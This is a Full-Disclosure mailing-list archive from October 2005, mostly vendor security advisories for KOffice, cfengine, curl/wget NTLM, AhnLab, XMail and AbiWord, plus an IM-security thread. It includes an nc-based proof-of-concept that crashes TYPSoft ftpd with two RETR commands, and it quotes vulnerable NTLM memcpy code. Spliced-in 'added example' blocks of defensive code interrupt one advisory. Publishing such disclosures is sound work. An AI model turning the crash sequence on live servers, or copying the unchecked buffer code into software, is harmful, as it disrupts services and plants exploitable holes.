RE: [Full-disclosure] Redmond Report: Yahoo for IM

2005-10-13 Thread Aditya Deshmukh
> Doug,
> I know you asked for a reply concerning "multi-vendor IM clients", but, I
> have to ask "WHAT ABOUT SECURITY"!!

Trillian is pretty good 

> I fight daily with pesky spam, malware, viruses, and back-doors. Every
> computer I clean has some type of IM client or a residual of one including
> all the little extra "tool bars" and "weather bugs" and such. They HOG the
> enterprise bandwidth with "ads" not to mention the problems of employees
> keeping everything business. And now you tell me Windows wants to marry into
> IM. Is this going to be an "option" or one day a default installation?

Trillian has no problems with spyware and other advertisements and
spam. You can run an internal Jabber server and use Trillian to connect to
that server. That takes care of security and employees' business also. As a
bonus, it's open source.

> Exactly what is Windows' plan here?? Am I getting carried away? Will I be
> looking for "IM patches" on patch Tuesday? Do I have a lot more questions
> and concerns?? YES!

IM patches + other vulns in .NET and Yahoo messengers are the main reason
that I moved most of my clients to a Jabber server + Trillian 3.1 Pro and
removed the AIM, MSN, ICQ and IRC plugins - it works like a charm.



Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [ GLSA 200510-12 ] KOffice, KWord: RTF import buffer overflow

2005-10-13 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: KOffice, KWord: RTF import buffer overflow
      Date: October 14, 2005
      Bugs: #108411
        ID: 200510-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

KOffice and KWord are vulnerable to a buffer overflow in the RTF
importer, potentially resulting in the execution of arbitrary code.

Background
==========

KOffice is an integrated office suite for KDE. KWord is the KOffice
word processor.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-office/koffice        < 1.4.1-r1                  >= 1.4.1-r1
  2  app-office/kword          < 1.4.1-r1                  >= 1.4.1-r1
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Chris Evans discovered that the KWord RTF importer was vulnerable to a
heap-based buffer overflow.

Impact
======

An attacker could entice a user to open a specially-crafted RTF file,
potentially resulting in the execution of arbitrary code with the
rights of the user running the affected application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/koffice-1.4.1-r1"

All KWord users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/kword-1.4.1-r1"

References
==========

  [ 1 ] CAN-2005-2971
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-2971
  [ 2 ] KDE Security Advisory: KWord RTF import buffer overflow
http://www.kde.org/info/security/advisory-20051011-1.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-12.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



[Full-disclosure] MDKSA-2005:184 - Updated cfengine packages fix temporary file vulnerabilities

2005-10-13 Thread Mandriva Security Team

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   cfengine
 Advisory ID:    MDKSA-2005:184
 Date:           October 13th, 2005

 Affected versions:  10.1, 10.2, 2006.0, Corporate 3.0,
 Corporate Server 2.1
 __

 Problem Description:

 Javier Fernández-Sanguino Peña discovered several insecure temporary
 file uses in cfengine <= 1.6.5 and <= 2.1.16 which allow local users
 to overwrite arbitrary files via a symlink attack on temporary files
 used by vicf.in. (CAN-2005-2960)
 
 In addition, Javier discovered the cfmailfilter and cfcron.in files
 for cfengine <= 1.6.5 allow local users to overwrite arbitrary files
 via a symlink attack on temporary files. (CAN-2005-3137)
 
 The updated packages have been patched to address this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2960
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3137
 __

 Updated Packages:
  
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security
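
Added example, not cfengine's own code: creating scratch files in a way that is not subject to the symlink attack this advisory describes (an unpredictable name opened with O_CREAT|O_EXCL, verified on the open descriptor, plus O_NOFOLLOW where the name must stay fixed). It assumes POSIX (mkstemp, O_NOFOLLOW) and a writable TMPDIR or /tmp; the "vicf." prefix and the demo helpers are constructed for illustration.

```c
/* Added example, not cfengine's own code: scratch files that are not
 * subject to the symlink attack in MDKSA-2005:184.  Assumes POSIX
 * (mkstemp, O_NOFOLLOW) and a writable TMPDIR or /tmp. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* 1 if fd is a regular file we own, with no group/other bits and a single
 * link; 0 otherwise.  Checking the open descriptor (fstat) instead of the
 * path (stat) leaves no window between the check and the use. */
int verify_private_file(int fd)
{
    struct stat st;
    if (fstat(fd, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && st.st_uid == geteuid()
        && (st.st_mode & 0077) == 0 && st.st_nlink == 1;
}

/* Creates a fresh file under dir.  mkstemp() picks an unpredictable suffix
 * and opens with O_CREAT|O_EXCL, so a symlink planted at the name makes the
 * call fail instead of being followed.  Returns the descriptor and stores
 * the path in path_out, or -1. */
int create_private_tmp(const char *dir, char *path_out, size_t path_len)
{
    int n = snprintf(path_out, path_len, "%s/vicf.XXXXXX", dir);
    if (n < 0 || (size_t)n >= path_len)
        return -1;
    int fd = mkstemp(path_out);
    if (fd < 0)
        return -1;
    if (!verify_private_file(fd)) {
        close(fd);
        unlink(path_out);
        return -1;
    }
    return fd;
}

/* When the name must stay fixed (as with the cfmailfilter/cfcron.in files):
 * never follow a symlink and never reuse an existing file, rather than
 * truncating whatever the name currently points at. */
int open_fixed_scratch(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static const char *scratch_dir(void)
{
    const char *d = getenv("TMPDIR");
    return (d && *d) ? d : "/tmp";
}

/* Demo 1: a mkstemp-created file passes the private-file check.  Returns 1. */
int demo_private_tmp(void)
{
    char path[4096];
    int fd = create_private_tmp(scratch_dir(), path, sizeof path);
    if (fd < 0)
        return 0;
    int ok = verify_private_file(fd);
    close(fd);
    unlink(path);
    return ok;
}

/* Demo 2: a symlink pre-planted at the fixed name is refused.  Builds a
 * constructed decoy (symlink to a file we own) and returns 1 if the open
 * fails with EEXIST or ELOOP instead of writing through the link. */
int demo_symlink_refused(void)
{
    char target[4096], link[4200];
    int tfd = create_private_tmp(scratch_dir(), target, sizeof target);
    if (tfd < 0)
        return 0;
    close(tfd);
    snprintf(link, sizeof link, "%s.link", target);
    if (symlink(target, link) != 0) {
        unlink(target);
        return 0;
    }
    int fd = open_fixed_scratch(link);
    int refused = fd < 0 && (errno == EEXIST || errno == ELOOP);
    if (fd >= 0)
        close(fd);
    unlink(link);
    unlink(target);
    return refused;
}
```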

[Full-disclosure] MDKSA-2005:183 - Updated wget packages fix NTLM authentication vulnerability

2005-10-13 Thread Mandriva Security Team

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   wget
 Advisory ID:    MDKSA-2005:183
 Date:           October 13th, 2005

 Affected versions:  2006.0
 __

 Problem Description:

 A vulnerability in libcurl's NTLM function can overflow a stack-based
 buffer if given too long a user name or domain name. This happens when
 NTLM authentication is enabled and either a) a user and domain name are
 passed to libcurl that together are longer than 192 bytes or b) (lib)curl
 is allowed to follow HTTP redirects and the new URL contains a user and
 domain name that together are longer than 192 bytes.
 
 Wget, as of version 1.10, uses the NTLM code from libcurl and is also
 vulnerable to this issue.
 
 The updated packages have been patched to address this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3185
  http://curl.haxx.se/mail/lib-2005-10/0061.html
 __

 Updated Packages:
  
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



[Full-disclosure] MDKSA-2005:182 - Updated curl packages fix NTLM authentication vulnerability

2005-10-13 Thread Mandriva Security Team

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   curl
 Advisory ID:    MDKSA-2005:182
 Date:           October 13th, 2005

 Affected versions:  10.1, 10.2, 2006.0, Corporate 3.0,
 Multi Network Firewall 2.0
 __

 Problem Description:

 A vulnerability in libcurl's NTLM function can overflow a stack-based
 buffer if given too long a user name or domain name. This happens when
 NTLM authentication is enabled and either a) a user and domain name are
 passed to libcurl that together are longer than 192 bytes or b) (lib)curl
 is allowed to follow HTTP redirects and the new URL contains a user and
 domain name that together are longer than 192 bytes.
 
 The updated packages have been patched to address this issue.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3185
  http://curl.haxx.se/mail/lib-2005-10/0061.html
 __

 Updated Packages:
  
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Tea

[Full-disclosure] Redmond Report: Yahoo for IM

2005-10-13 Thread Randall M
 
 

1) Redmond Report Weekly

By Doug Barney
Editor in Chief, Redmond magazine 


YAHOO FOR IM
I love and hate IM. I love quick little tactical 
conversations and decisions that can be made while you're 
pretending to pay attention to someone else. It was also a 
way for me to talk to my kids, until they figured out how 
to block my messages. But I hate how some rely upon IM 
instead of the phone, and how hard it is to end a 
conversation. How many conversations end, 'Thanks, you're 
welcome, see ya, yeah, see you too!'?

Another thing I hate is how these relatively simple apps 
don't work together because stubborn vendors refuse to cooperate. 

But now Yahoo! and Microsoft, perhaps sharing a common 
hatred of Google, have set aside their minor differences 
and decided to interoperate. Here, here! Now let's just get 
AOL on the bandwagon. 

Have you had any luck with multi-vendor IM clients like 
Trillium? Let me know at [EMAIL PROTECTED]
http://redmondmag.com/news/article.asp?editorialsid=6982



Doug,
I know you asked for a reply concerning "multi-vendor IM clients", but, I
have to ask "WHAT ABOUT SECURITY"!!
I fight daily with pesky spam, malware, viruses, and back-doors. Every
computer I clean has some type of IM client or a residual of one including
all the little extra "tool bars" and "weather bugs" and such. They HOG the
enterprise bandwidth with "ads" not to mention the problems of employees
keeping everything business. And now you tell me Windows wants to marry into
IM. Is this going to be an "option" or one day a default installation?
Exactly what is Windows' plan here?? Am I getting carried away? Will I be
looking for "IM patches" on patch Tuesday? Do I have a lot more questions
and concerns?? YES!

Thank You
Randall M

=

"You too can have your very own Computer!"

Note: Side effects include: 
Blue screens; interrupt violation;
illegal operations; remote code
exploitations; virus and malware infestations;
and other unknown vulnerabilities.




[Full-disclosure] TYPSoft ftpd

2005-10-13 Thread Morning Wood
EXPL-A-2005-016 exploitlabs.com Advisory 045





AFFECTED PRODUCTS

TYPSoft FTP Server v1.11 and earlier
http://www.typsoft.com/



OVERVIEW

TYPSoft FTP Server is a fast and easy ftp server
 with support to Standard FTP Command,
 Clean interface, Virtual File System architecture,
 ability to resume Download and Upload, IP Restriction,
 Login/Quit message, logs, Multi Language
 and many other things.



DETAILS

1. DOS
TYPSoft FTP server does not properly support the
 RETR command when "Sub Directory Include" is checked
 in the user config. This is exploitable by users
 authenticated to TYPSoft ftpd.



POC
1. by requesting 2 RETR [string] commands in succession

C:\>nc -v 192.168.0.2 21
ftpserv [192.168.0.2] 21 (ftp) open
220 TYPSoft FTP Server 1.11 ready...
USER ok
331 Password required for ok.
PASS ok
230 User ok logged in.
RETR 0
150 Opening data connection for 0.
RETR 0
150 Opening data connection for 0.
[ crash here ]
C:\>

Exception ESocketException in module ftpserv.exe at 000862A6
"no port specified"

note: string length has no effect and
   does not appear exploitable.




SOLUTION:
vendor contact:
Oct 10, 2005 [EMAIL PROTECTED]

response:
-
Well, I don't see any security problem except that TFS will raise an error
because the socket was not open on the second RETR.

It's more a bug than a security problem, except if you show me the opposite.

Marc
TYPSoft


reply:
--
see attached perl POC
http://www.exploitlabs.com/files/advisories/typsoft-poc.zip

it demonstrates a full crash ( program exit ) from remote.
note: a remote DOS[crash] is classified as a security issue, even if it does
not lead to compromise, due to the fact that a remote user ( not
administrative ) can disable[crash] a (needed) service.


response:
-
[none]




CREDITS

This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2005-016-typsoft-ftpd.txt


[Full-disclosure] Secunia Research: AhnLab V3 Antivirus ALZ/UUE/XXE Archive Handling Buffer Overflow

2005-10-13 Thread Secunia Research
== 

 Secunia Research 13/10/2005

 - AhnLab V3 Antivirus ALZ/UUE/XXE Archive Handling Buffer Overflow -

== 
Table of Contents

Affected Software1
Severity.2
Description of Vulnerability.3
Solution.4
Time Table...5
Credits..6
References...7
About Secunia8
Verification.9

== 
1) Affected Software 

AhnLab V3Pro 2004 (V3 VirusBlock 2005 international) (Build 6.0.0.457)
AhnLab V3Net for Windows Server 6.0 (Build 6.0.0.457)
AhnLab MyV3 with AzMain.dll 1.3.11.15

Prior versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in AhnLab V3 
Antivirus, which can be exploited by malicious people to compromise
a vulnerable system.

The vulnerability is caused due to a boundary error in the archive
decompression library when reading the filename of a compressed file 
from an ALZ, UUE or XXE archive. This can be exploited to cause a 
stack-based buffer overflow (ALZ), or a heap-based buffer overflow
(UUE/XXE), when a malicious ALZ/UUE/XXE archive is scanned.

Successful exploitation allows arbitrary code execution, but requires 
that compressed file scanning is enabled.

== 
4) Solution 

AhnLab V3Pro 2004 (V3 VirusBlock 2005 international):
Update to version 6.0.0.488 via Smart Update.

AhnLab V3Net for Windows Server 6.0:
Update to version 6.0.0.488 via Smart Update.

AhnLab MyV3:
The vulnerability has reportedly been fixed in the vendor's Korean
MyV3 website.

== 
5) Time Table 

19/09/2005 - Initial vendor notification.
20/09/2005 - Initial vendor response.
13/10/2005 - Vendor releases advisory.
13/10/2005 - Public disclosure.

== 
6) Credits 

Discovered by Tan Chew Keong, Secunia Research.

== 
7) References

AhnLab:
http://global.ahnlab.com/security/security_advisory002.html

== 
8) About Secunia 

Secunia collects, validates, assesses, and writes advisories regarding 
all the latest software vulnerabilities disclosed to the public. These 
advisories are gathered in a publicly available database at the 
Secunia website: 

http://secunia.com/

Secunia offers services to our customers enabling them to receive all 
relevant vulnerability information to their specific system 
configuration. 

Secunia offers a FREE mailing list called Secunia Security Advisories: 

http://secunia.com/secunia_security_advisories/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-48/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==





[Full-disclosure] iDEFENSE Security Advisory 10.13.05: Multiple Vendor wget/curl NTLM Username Buffer Overflow Vulnerability

2005-10-13 Thread iDEFENSE Labs
Multiple Vendor wget/curl NTLM Username Buffer Overflow Vulnerability

iDEFENSE Security Advisory 10.13.05
www.idefense.com/application/poi/display?id=322&type=vulnerabilities
October 13, 2005

I. BACKGROUND

GNU Wget is a free software package for retrieving files using HTTP,
HTTPS and FTP, the most widely-used Internet protocols. It is a
non-interactive commandline tool, so it may easily be called from
scripts, cron jobs, terminals without X-Windows support, etc. More
information on Wget is available from the vendor website:

http://www.gnu.org/software/wget/wget.html

curl is a command line tool for transferring files with URL syntax,
supporting FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP.
Curl supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading,
HTTP form based upload, proxies, cookies, user+password authentication
(Basic, Digest, NTLM, Negotiate, kerberos...), file transfer resume,
proxy tunneling and a busload of other useful tricks. More information
on curl is available from the vendor website:

http://curl.haxx.se/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in multiple 
vendor's implementations of curl and wget allows attackers to execute 
arbitrary code. 

The vulnerability specifically exists due to insufficient bounds 
checking on user-supplied data supplied to a memory copy operation. The 
memcpy() of the supplied ntlm username to ntlmbuf shown below results 
in a stack overflow:

http-ntlm.c in ntlm_output() on line 532:

/* size is now 64 */
size=64;
ntlmbuf[62]=ntlmbuf[63]=0;

/* domlen and userlen come from the URL's credentials and are never
   compared against the space left in ntlmbuf after the 64-byte header */
memcpy(&ntlmbuf[size], domain, domlen);
size += domlen;

memcpy(&ntlmbuf[size], usr, userlen);
size += userlen;

The resulting stack overflow can be leveraged to gain arbitrary code 
execution with user privileges.

III. ANALYSIS

Successful exploitation of the vulnerability allows remote attackers to 
execute arbitrary code with permissions of the http client process. 
User interaction is required. Exploitation requires a user to use one 
of the affected clients to connect to a malicious website.

This vulnerability affects both wget and curl clients similarly because 
wget 1.10 adopted the curl ntlm authentication source code into its own 
code base. The described vulnerability requires that ntlm authentication
is enabled in the affected client versions. A factor that somewhat 
increases the risk of this vulnerability is that a client can be forced 
to reconnect using ntlm authentication by issuing a HTTP 302 REDIRECT 
command to the connecting client.

IV. DETECTION

iDEFENSE Labs has confirmed the following software versions are 
vulnerable:

*   wget 1.10
*   curl 7.13.2
*   libcurl 7.13.2 

V. WORKAROUND

As a workaround solution, disable NTLM support in wget and curl 
installations.

VI. VENDOR RESPONSE

wget 1.10.2 has been released to address this issue and is available for
download at:

   http://ftp.gnu.org/pub/gnu/wget/

curl has released the following patch to address this issue:

   http://curl.haxx.se/libcurl-ntlmbuf.patch

curl has also released the following security advisory:

   http://curl.haxx.se/mail/lib-2005-10/0061.html
   
Additionally, the maintainers of curl-web have provided the following
details on affected versions:

Affected versions: curl and libcurl 7.10.6 to and including 7.14.1

Not affected versions: curl and libcurl 7.10.5 and earlier,
  7.15.0 and later

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-3185 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
10/13/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
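
Added example, not curl's or wget's own code: the buffer fill quoted in section II with the length check that the vulnerable code lacks placed in front of the two memcpy() calls. It assumes an ntlmbuf of 256 bytes (256 minus the 64-byte header gives the 192-byte combined user + domain limit cited in the curl advisory); the helper ntlm_demo and its "CORP" domain are constructed for illustration.

```c
/* Added example (not curl's or wget's own code): the ntlm_output() buffer
 * fill from the advisory, with the missing bounds check in front of it.
 * Assumes ntlmbuf is 256 bytes; 256 - 64 header bytes = the 192-byte
 * combined user + domain limit the curl advisory cites. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NTLM_BUFSIZE 256   /* assumed size of ntlmbuf */
#define NTLM_HEADER   64   /* fixed type-3 header occupying bytes 0..63 */

/* Copies domain and user name after the header, as ntlm_output() does.
 * Returns the number of bytes now in buf, or -1 when the two names would
 * overrun buf.  Both lengths come from the URL's credentials, which a
 * redirect target can supply (section III), so they are untrusted. */
int ntlm_fill_names(unsigned char *buf, size_t bufsize,
                    const char *domain, const char *usr)
{
    size_t domlen  = strlen(domain);
    size_t userlen = strlen(usr);
    size_t size    = NTLM_HEADER;

    if (bufsize < NTLM_HEADER)
        return -1;
    /* The check the vulnerable code lacks: bound both copies by the space
     * remaining after the header, before touching the buffer.  The second
     * subtraction cannot underflow because the first test already passed. */
    if (domlen > bufsize - size || userlen > bufsize - size - domlen)
        return -1;

    memset(buf, 0, NTLM_HEADER);      /* stand-in for the real header fields */
    buf[62] = buf[63] = 0;

    memcpy(&buf[size], domain, domlen);
    size += domlen;
    memcpy(&buf[size], usr, userlen);
    size += userlen;
    return (int)size;
}

/* Drives ntlm_fill_names with domain "CORP" and a user name of user_len 'A's
 * (constructed sample input).  Returns the fill result, or -2 if user_len
 * exceeds the scratch buffer. */
int ntlm_demo(size_t user_len)
{
    unsigned char ntlmbuf[NTLM_BUFSIZE];
    char usr[512];

    if (user_len >= sizeof usr)
        return -2;
    memset(usr, 'A', user_len);
    usr[user_len] = '\0';
    return ntlm_fill_names(ntlmbuf, sizeof ntlmbuf, "CORP", usr);
}

int main(void)
{
    printf("5-byte user: %d bytes used\n", ntlm_demo(5));        /* 73 */
    printf("188-byte user (fits exactly): %d\n", ntlm_demo(188)); /* 256 */
    printf("189-byte user (rejected): %d\n", ntlm_demo(189));     /* -1 */
    return 0;
}
```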

[Full-disclosure] iDEFENSE Security Advisory 10.13.05: Multiple Vendor XMail 'sendmail' Recipient Buffer Overflow Vulnerability

2005-10-13 Thread iDEFENSE Labs
Multiple Vendor XMail 'sendmail' Recipient Buffer Overflow Vulnerability

iDEFENSE Security Advisory 10.13.05
www.idefense.com/application/poi/display?id=321&type=vulnerabilities
October 13, 2005

I. BACKGROUND

XMail is an Internet and intranet mail server. XMail sources compile
under GNU/Linux, FreeBSD, OpenBSD, NetBSD, OSX, Solaris and NT/2K/XP.

More information can be found at the vendor website:

   http://www.xmailserver.org/

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in XMail, as
distributed with multiple vendors' operating systems, allows local
attackers to execute arbitrary code with elevated privileges.

The vulnerability exists because of insufficient bounds checking on
user-supplied data. Specifically, the AddressFromAtPtr function fails to
check bounds on arguments passed from other functions, and as a result
an exploitable stack overflow condition occurs when specifying the "-t"
command line option. The "-t" command line option allows users to
specify the recipient value in the text of the message on a line
beginning with "To:". XMail passes the user-supplied value without
bounds checking to AddressFromAtPtr and attempts to store the hostname
portion of the e-mail address in a 256-byte buffer. Crafted e-mail
addresses can overflow the buffer and overwrite stack process control
data, resulting in local code execution with elevated privileges.

III. ANALYSIS

Successful exploitation will result in code execution with elevated
privileges. XMail is distributed in RPM, DEB and source format. The RPM
distribution installs the sendmail binary with setuid root privileges.
Exploitation of XMail installed from RPM will yield root. Other
distribution formats install the sendmail binary as setgid mail.
Exploitation resulting in group mail privileges will allow an attacker
to read all unencrypted mail stored locally in the system mail folders.

IV. DETECTION

iDEFENSE Labs has confirmed the existence of this vulnerability in XMail
1.21.

V. WORKAROUND

As a workaround solution, local mail delivery can be restricted and a
standard mail user-agent may be used to talk to the XMail SMTP server.

VI. VENDOR RESPONSE

The vendor has released XMail 1.22 to address this issue which is
available for download at:

   http://www.xmailserver.org/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-2943 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/12/2005  Initial vendor notification
10/12/2005  Initial vendor response
10/13/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
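The impact of this overflow depends entirely on how the sendmail binary is installed (setuid root from the RPM, setgid mail from other formats). As an added check that is not part of the iDEFENSE advisory, the POSIX shell script below classifies a given binary by its setuid/setgid bits and owner or group and maps the result to the impact class section III describes. The path /usr/bin/sendmail is an assumed default; pass the real path of the XMail sendmail binary as the first argument.

```shell
#!/bin/sh
# Added example (not from the iDEFENSE advisory): classify how a local
# delivery binary such as XMail's sendmail is installed, since the
# advisory's impact depends on whether it is setuid root (RPM) or
# setgid mail (other formats). /usr/bin/sendmail is an assumed default
# path; pass the real path of the XMail sendmail binary as $1.

# privilege_exposure FILE
# Prints: setuid:<owner>, setgid:<group>, none, or missing.
privilege_exposure() {
    f=$1
    [ -e "$f" ] || { echo missing; return 0; }
    owner=$(ls -ld "$f" | awk '{print $3}')
    group=$(ls -ld "$f" | awk '{print $4}')
    if [ -u "$f" ]; then
        echo "setuid:$owner"      # exec runs with the owner's uid
    elif [ -g "$f" ]; then
        echo "setgid:$group"      # exec runs with the group's gid
    else
        echo none
    fi
}

# impact_of CLASSIFICATION
# Maps the classification to the impact class section III describes.
impact_of() {
    case $1 in
        setuid:root) echo "overflow yields root" ;;
        setuid:*)    echo "overflow yields uid of user ${1#setuid:}" ;;
        setgid:mail) echo "overflow yields group mail: local mail folders readable" ;;
        setgid:*)    echo "overflow yields gid of group ${1#setgid:}" ;;
        none)        echo "no privilege elevation on exec" ;;
        *)           echo "binary not found" ;;
    esac
}

# Usage: sh check-xmail-sendmail.sh /path/to/xmail/sendmail
TARGET=${1:-/usr/bin/sendmail}
CLASS=$(privilege_exposure "$TARGET")
echo "$TARGET: $CLASS ($(impact_of "$CLASS"))"
```

A host that reports setuid:root is in the root-compromise class and should be upgraded to 1.22 first; a setgid:mail host is in the mailbox-disclosure class described above.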
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Microsoft Outlook Web Access

2005-10-13 Thread Vernocchi, Pablo
Hi Petko,

BID:9409 has a solution:
http://www.securityfocus.com/bid/9409/solution

Anyway, I recommend you use MBSA (Microsoft Baseline Security Analyzer)
once a week to check for issues, or Retina as well.

Also, there's a tool called Microsoft Exchange Best Practices Analyzer
that may help you troubleshoot non-standard or non-recommended
configs.

http://www.microsoft.com/exchange/downloads/2003/exbpa/default.mspx

Regards,
PV


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On behalf of Petko Petkov
Sent: Thursday, 13 October 2005 06:22 a.m.
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Microsoft Outlook Web Access

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 
Hello there,
I've been messing around with Microsoft Outlook Web Access (SP1)
trying to test and see what I can do. I found several vulnerabilities
on google/securityfocus related to this particular version but none of
them seem to work. I went to the Microsoft website and I can't see any
patches available. Well, there is one fix that I really don't know
what it is for.

Does anyone know if BID:12459 and BID:9409 have been fixed?
If not, is there a way to prevent those attacks from happening?

Thanks
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (MingW32)
 
iD8DBQFDTic+Ff/6vxAyUpgRAgWgAJ9d+hpQ650dOfoZiQljAFtfeZJJ5QCgv6bO
mCC1wAHPw4vcA1bKPe45KJY=
=+TZH
-END PGP SIGNATURE-



[Full-disclosure] [USN-203-1] Abiword vulnerabilities

2005-10-13 Thread Martin Pitt
===
Ubuntu Security Notice USN-203-1   October 13, 2005
abiword vulnerabilities
CAN-2005-2972
===

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)

The following packages are affected:

abiword

The problem can be corrected by upgrading the affected package to
version 2.0.7+cvs.2004.05.05-1ubuntu3.3 (for Ubuntu 4.10), or
2.2.2-1ubuntu2.2 (for Ubuntu 5.04). After a standard system upgrade
you have to restart Abiword to effect the necessary changes.

Details follow:

Chris Evans discovered several buffer overflows in the RTF import
module of AbiWord. By tricking a user into opening an RTF file with
specially crafted long identifiers, an attacker could exploit this to
execute arbitrary code with the privileges of the AbiWord user.


Updated packages for Ubuntu 4.10:

  Source archives:


